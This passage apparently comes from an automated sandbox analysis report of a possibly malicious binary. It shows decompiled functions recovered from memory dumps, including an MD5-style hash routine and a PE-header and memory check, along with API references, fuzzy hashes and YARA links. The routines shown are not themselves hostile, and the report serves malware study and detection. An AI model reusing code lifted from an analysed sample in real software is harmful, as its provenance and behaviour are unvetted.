				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                              0x013e3376
                              0x013e3381
                              0x013e3384
                              0x013e3387
                              0x013e3388
                              0x013e3388
                              0x013e3393
                              0x013e33a4
                              0x013e33a6
                              0x013e33a9
                              0x013e33a9
                              0x013e33ac
                              0x013e33ac
                              0x013e33af
                              0x013e33af
                              0x013e33b2
                              0x013e33b2
                              0x013e33cf
                              0x013e33d2
                              0x013e33e8
                              0x013e33eb
                              0x013e3405
                              0x013e3408
                              0x013e341e
                              0x013e3421
                              0x013e3423
                              0x013e343b
                              0x013e343e
                              0x013e3441
                              0x013e3459
                              0x013e345c
                              0x013e3476
                              0x013e3479
                              0x013e348f
                              0x013e3492
                              0x013e3494
                              0x013e34ac
                              0x013e34b1
                              0x013e34b4
                              0x013e34ca
                              0x013e34cd
                              0x013e34e7
                              0x013e34ea
                              0x013e3500
                              0x013e3503
                              0x013e3505
                              0x013e3520
                              0x013e3523
                              0x013e353a
                              0x013e353d
                              0x013e3541
                              0x013e355a
                              0x013e355d
                              0x013e355f
                              0x013e3562
                              0x013e357d
                              0x013e3580
                              0x013e3599
                              0x013e359c
                              0x013e35ac
                              0x013e35af
                              0x013e35c7
                              0x013e35ca
                              0x013e35e4
                              0x013e35e7
                              0x013e35ff
                              0x013e3602
                              0x013e3618
                              0x013e361b
                              0x013e3633
                              0x013e3636
                              0x013e364e
                              0x013e3651
                              0x013e366b
                              0x013e366e
                              0x013e3684
                              0x013e3687
                              0x013e369f
                              0x013e36a2
                              0x013e36bc
                              0x013e36bf
                              0x013e36d7
                              0x013e36da
                              0x013e36f0
                              0x013e36f3
                              0x013e370b
                              0x013e370e
                              0x013e3726
                              0x013e3729
                              0x013e373b
                              0x013e373e
                              0x013e3750
                              0x013e3753
                              0x013e3765
                              0x013e3768
                              0x013e376c
                              0x013e377c
                              0x013e377f
                              0x013e378d
                              0x013e3790
                              0x013e37a2
                              0x013e37a5
                              0x013e37b9
                              0x013e37bc
                              0x013e37be
                              0x013e37ce
                              0x013e37d1
                              0x013e37e3
                              0x013e37e6
                              0x013e37f4
                              0x013e37f7
                              0x013e3809
                              0x013e380c
                              0x013e3810
                              0x013e3820
                              0x013e3823
                              0x013e3835
                              0x013e3838
                              0x013e3846
                              0x013e3849
                              0x013e385b
                              0x013e385e
                              0x013e3870
                              0x013e3873
                              0x013e3887
                              0x013e388a
                              0x013e389e
                              0x013e38a1
                              0x013e38b5
                              0x013e38b8
                              0x013e38cc
                              0x013e38cf
                              0x013e38e3
                              0x013e38e6
                              0x013e38fa
                              0x013e38ff
                              0x013e3911
                              0x013e3914
                              0x013e3928
                              0x013e392b
                              0x013e393f
                              0x013e3942
                              0x013e3958
                              0x013e395b
                              0x013e396f
                              0x013e3972
                              0x013e3984
                              0x013e3987
                              0x013e399b
                              0x013e399e
                              0x013e39b2
                              0x013e39b5
                              0x013e39c9
                              0x013e39d2
                              0x013e39d5
                              0x013e39de
                              0x013e39e7
                              0x013e39ef
                              0x013e39f7
                              0x013e3a01
                              0x013e3a16

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                              • Instruction ID: b3adafc1e322788ef249501b883bb42551bb7e5f36a5aff09460e0c8f7c612a6
                              • Opcode Fuzzy Hash: da50312a0738fb8208467b0dc573d7b64c48983018d811ed3d5c943799986d32
                              • Instruction Fuzzy Hash: 8E22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102366D, Relevance: 1.8, Strings: 1, Instructions: 583COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: efce550417713b946daaebcaa1dd037909378da6d3b0fa6eca907473515c9663
                              • Instruction ID: 0790e711aee4fd12e3fd6ad4c907a12abaa5998ce64920ecd221e36a0ac6366f
                              • Opcode Fuzzy Hash: efce550417713b946daaebcaa1dd037909378da6d3b0fa6eca907473515c9663
                              • Instruction Fuzzy Hash: 9A428D70A00B658FCB29CF69C4906AABBF1FF4D304F5889ADD4CB9B655D778A485CB00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010353A6, Relevance: 1.8, APIs: 1, Instructions: 556COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,?,00000000,000000FE,00000000,?,00000000), ref: 01035764
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 5279c614074fadf263421e4d654e8b42e2ae18bcccd5cc66f58a76856bc56bed
                              • Instruction ID: e734b50a61f3a2c47063b56569a10628f94a215b6b91561fe82150b8b0f5c1ab
                              • Opcode Fuzzy Hash: 5279c614074fadf263421e4d654e8b42e2ae18bcccd5cc66f58a76856bc56bed
                              • Instruction Fuzzy Hash: 3E325771A00204DFEF59CF58C8807ADBBF6FF98310F248599D895AB296DB71DA41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013EB2A9, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013EB2A9(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x13ed310; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x13ed358 = 1;
										__eflags =  *0x13ed358;
										if( *0x13ed358 != 0) {
											goto L60;
										}
										_t84 =  *0x13ed310; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x13ed358 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x13ed310 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x13ed318 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x13ed314 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x13ed318 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x13ed318 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x13ed358 = 1;
							__eflags =  *0x13ed358;
							if( *0x13ed358 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x13ed318 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x13ed318 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x13ed358 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x13ed318 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x13ed310 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x13ed318 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x13ed318 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                              0x013eb2b3
                              0x013eb2b6
                              0x013eb2bc
                              0x013eb2da
                              0x00000000
                              0x013eb2da
                              0x013eb2c4
                              0x013eb2cd
                              0x013eb2d3
                              0x013eb2e2
                              0x013eb2e5
                              0x013eb2e8
                              0x013eb2f2
                              0x013eb2f2
                              0x013eb2f4
                              0x013eb2f7
                              0x013eb2f9
                              0x013eb2f9
                              0x013eb2fb
                              0x013eb2fe
                              0x00000000
                              0x00000000
                              0x013eb300
                              0x013eb302
                              0x013eb368
                              0x013eb368
                              0x013eb4c6
                              0x00000000
                              0x013eb4c6
                              0x013eb304
                              0x013eb304
                              0x013eb308
                              0x013eb30a
                              0x013eb30a
                              0x013eb30a
                              0x013eb30a
                              0x013eb30d
                              0x013eb30e
                              0x013eb311
                              0x013eb311
                              0x013eb315
                              0x013eb319
                              0x013eb327
                              0x013eb327
                              0x013eb32f
                              0x013eb335
                              0x013eb337
                              0x013eb339
                              0x013eb349
                              0x013eb356
                              0x013eb35a
                              0x013eb35f
                              0x013eb361
                              0x013eb3df
                              0x013eb3df
                              0x013eb363
                              0x013eb363
                              0x013eb363
                              0x013eb3e1
                              0x013eb3e3
                              0x013eb4c4
                              0x013eb4c4
                              0x00000000
                              0x013eb3e9
                              0x013eb3e9
                              0x013eb3f0
                              0x00000000
                              0x00000000
                              0x013eb3f6
                              0x013eb3fa
                              0x013eb456
                              0x013eb458
                              0x013eb460
                              0x013eb462
                              0x013eb464
                              0x00000000
                              0x00000000
                              0x013eb466
                              0x013eb46c
                              0x013eb46e
                              0x013eb470
                              0x013eb485
                              0x013eb485
                              0x013eb487
                              0x013eb4b6
                              0x013eb4bd
                              0x00000000
                              0x013eb4bd
                              0x013eb48b
                              0x013eb48c
                              0x013eb48e
                              0x013eb490
                              0x013eb490
                              0x013eb492
                              0x013eb494
                              0x013eb496
                              0x013eb4aa
                              0x013eb4aa
                              0x013eb4ad
                              0x013eb4af
                              0x013eb4af
                              0x013eb4b0
                              0x013eb4b0
                              0x00000000
                              0x013eb498
                              0x013eb498
                              0x013eb498
                              0x013eb4a1
                              0x013eb4a2
                              0x013eb4a4
                              0x013eb4a6
                              0x013eb4a6
                              0x00000000
                              0x013eb498
                              0x013eb496
                              0x013eb472
                              0x013eb479
                              0x013eb479
                              0x013eb47b
                              0x00000000
                              0x00000000
                              0x013eb47d
                              0x013eb47e
                              0x013eb481
                              0x013eb483
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb483
                              0x00000000
                              0x013eb479
                              0x013eb3fc
                              0x013eb3ff
                              0x013eb404
                              0x00000000
                              0x00000000
                              0x013eb40d
                              0x013eb40f
                              0x013eb415
                              0x00000000
                              0x00000000
                              0x013eb41b
                              0x013eb421
                              0x00000000
                              0x00000000
                              0x013eb427
                              0x013eb429
                              0x013eb432
                              0x013eb436
                              0x00000000
                              0x00000000
                              0x013eb43c
                              0x013eb43f
                              0x013eb441
                              0x00000000
                              0x00000000
                              0x013eb448
                              0x013eb44a
                              0x00000000
                              0x00000000
                              0x013eb44c
                              0x013eb450
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb450
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb33b
                              0x013eb33b
                              0x013eb33b
                              0x013eb342
                              0x00000000
                              0x00000000
                              0x013eb344
                              0x013eb345
                              0x013eb347
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb347
                              0x013eb36f
                              0x013eb371
                              0x00000000
                              0x00000000
                              0x013eb381
                              0x013eb383
                              0x013eb385
                              0x00000000
                              0x00000000
                              0x013eb38b
                              0x013eb392
                              0x013eb3be
                              0x013eb3be
                              0x013eb3c0
                              0x013eb3c2
                              0x013eb3d6
                              0x013eb3d8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb3c4
                              0x013eb3c4
                              0x013eb3c4
                              0x013eb3cd
                              0x013eb3ce
                              0x013eb3d0
                              0x013eb3d2
                              0x013eb3d2
                              0x00000000
                              0x013eb3c4
                              0x013eb394
                              0x013eb394
                              0x013eb397
                              0x013eb399
                              0x013eb3ab
                              0x013eb3ab
                              0x013eb3ae
                              0x013eb3b0
                              0x013eb3b0
                              0x013eb3b1
                              0x013eb3b1
                              0x013eb3b7
                              0x013eb3b7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb39b
                              0x013eb39b
                              0x013eb39b
                              0x013eb3a2
                              0x00000000
                              0x00000000
                              0x013eb3a4
                              0x013eb3a4
                              0x013eb3a5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb3a5
                              0x013eb3a7
                              0x013eb3a9
                              0x013eb3bc
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb3bc
                              0x00000000
                              0x013eb3a9
                              0x013eb31b
                              0x013eb31e
                              0x013eb321
                              0x00000000
                              0x00000000
                              0x013eb323
                              0x013eb325
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eb325
                              0x013eb2ea
                              0x013eb2ec
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 013EB35A
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: MemoryQueryVirtual
                              • String ID:
                              • API String ID: 2850889275-0
                              • Opcode ID: b3703ea83ab6615a86651c3d0d35c3705cb01ea774a80b7ec0716f22113dbc89
                              • Instruction ID: 0db4a34ce82c5b7c77c2c5d1e22d0af6125a92ad9565403452b9a06d3b4c207c
                              • Opcode Fuzzy Hash: b3703ea83ab6615a86651c3d0d35c3705cb01ea774a80b7ec0716f22113dbc89
                              • Instruction Fuzzy Hash: E461EE306007269BEB2BCE6DC488629B7E5EF8571CF288429D915DB6DEE730D841CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01027A06, Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 1a8c8b71b26ba80787053b4dded8a9c99399c88f9419866838543e92f3df5ac7
                              • Instruction ID: 4e156d34183f36ecb8fe2c2ec19905c8a4c23bc9df08188a0acef10d3adb4682
                              • Opcode Fuzzy Hash: 1a8c8b71b26ba80787053b4dded8a9c99399c88f9419866838543e92f3df5ac7
                              • Instruction Fuzzy Hash: D0D15B71A0026ACBCB59CFA8C4905FEBBB1FFA4314F2481ADE99297241E7709A55CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01038A31, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01038AA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CreateProcessUser
                              • String ID:
                              • API String ID: 2217836671-0
                              • Opcode ID: 3553f03f8ef1fd702efb6a18502452030807a9e4d8d5cf6bb52a5983f99618aa
                              • Instruction ID: 6609767f46ecc32188d02a53dc689fa86e0046efaa1615259482f7e859575757
                              • Opcode Fuzzy Hash: 3553f03f8ef1fd702efb6a18502452030807a9e4d8d5cf6bb52a5983f99618aa
                              • Instruction Fuzzy Hash: 7D11A232104149BFEF428E98DD40DEA7FAAFF48365F098255FE9952120C736D872EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102D049, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                              Download Yara Rule
                              APIs
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 0102D061
                              Memory Dump Source
